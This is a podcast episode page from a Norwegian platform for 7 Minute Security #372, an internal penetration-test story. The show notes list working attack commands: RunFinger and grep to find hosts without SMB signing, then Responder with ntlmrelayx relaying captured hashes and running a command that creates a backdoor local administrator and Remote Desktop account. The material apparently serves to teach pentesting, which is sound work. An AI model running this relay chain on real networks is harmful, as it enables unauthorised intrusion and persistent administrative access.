Podme logo
HjemOppdagKategorierSøkStudent
7MS #372: Tales of Internal Pentest Pwnage - Part 5

7MS #372: Tales of Internal Pentest Pwnage - Part 5

43:572019-07-15

Om episode

Today's episode is brought to you by ITProTV. It’s never too late to start a new career in IT or move up the ladder, and ITProTV has you covered - from CompTIA and Cisco to EC-Council and VMWare. Get over 65 hours of IT training for free by visiting https://pro.tv/7minute Today I share the (hopefully) exciting and fun conclusion to last week's episode about a tale of internal pentest pwnage! A few important notes from today's episode: Need to find which hosts on your network have SMB signing disabled, and then get a nice clean list of IPs as a result? Try this: opt/responder/tools/RunFinger.py -i THE.SUBNET.YOU-ARE.ATTACKING/24 -g > hosts.txt grep "Signing:'False'" hosts.txt | grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' > targets.txt Source: Pwning internal networks automagically Ready to pass captured hashes from one host to another? Open responder.conf and turn SMB and HTTP to Off, then get Responder running in one window, and ntlmrelayx in another. Specifically, I like to use ntlmrelayx.py -tf targets.txt where targets.txt is the list of machines you found that are not using SMB signing. I also like to add a -c to run a string of my choice. Check out this fun evil little nugget: net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add So the full command would be: ntlmrelayx.py -tf targets.txt -c 'net user /add ladmin1 s00p3rn4ughtyguy! /Y & net localgroup Administrators ladmin1 /add & net localgroup "Remote Desktop Users" ladmin1 /add' Check today's show notes at https://7ms.us for more information!

Nyeste episoder

7 Minute Security
7 Minute Security

7MS #641: DIY Pentest Dropbox Tips – Part 10

2024-09-1327min
7 Minute Security
7 Minute Security

7MS #640: Tales of Pentest Pwnage – Part 63

2024-09-0743min
7 Minute Security
7 Minute Security

7MS #639: Tales of Pentest Pwnage - Part 62

2024-09-037min
7 Minute Security
7 Minute Security

7MS #638: Tales of Pentest Pwnage – Part 61

2024-08-2332min
7 Minute Security
7 Minute Security

7MS #637: BPATTY[RELOADED] Release Party

2024-08-177min
7 Minute Security
7 Minute Security

7MS #636: A Prelude to BPATTY(RELOADED)

2024-08-1211min
7 Minute Security
7 Minute Security

7MS #635: Eating the Security Dog Food - Part 7

2024-08-0345min
7 Minute Security
7 Minute Security

7MS #634: Tales of Pentest Pwnage - Part 60

2024-07-2632min
7 Minute Security
7 Minute Security

7MS #633: How to Create a Security Knowledgebase with Docusaurus

2024-07-1914min
7 Minute Security
7 Minute Security

7MS #632: Tales of Pentest Pwnage – Part 59

2024-07-1248min
logo

PODME

INFORMASJON

  • Om informasjonskapsler
  • Generelle vilkår
  • Personvernerklæring

LAST NED APPEN

app storegoogle play store

REGION

flag
  • sweden_flag
  • norway_flag
  • finland_flag
redaktorsansvar

Podme arbeider etter Vær Varsom-plakatens regler for god presseskikk. Ansvarlig redaktør og daglig leder er Kristin Ward Heimdal. Redaktør for eksterne innholdssamarbeid er Mathias Thaulow Lisberg.

© Podme AB 2024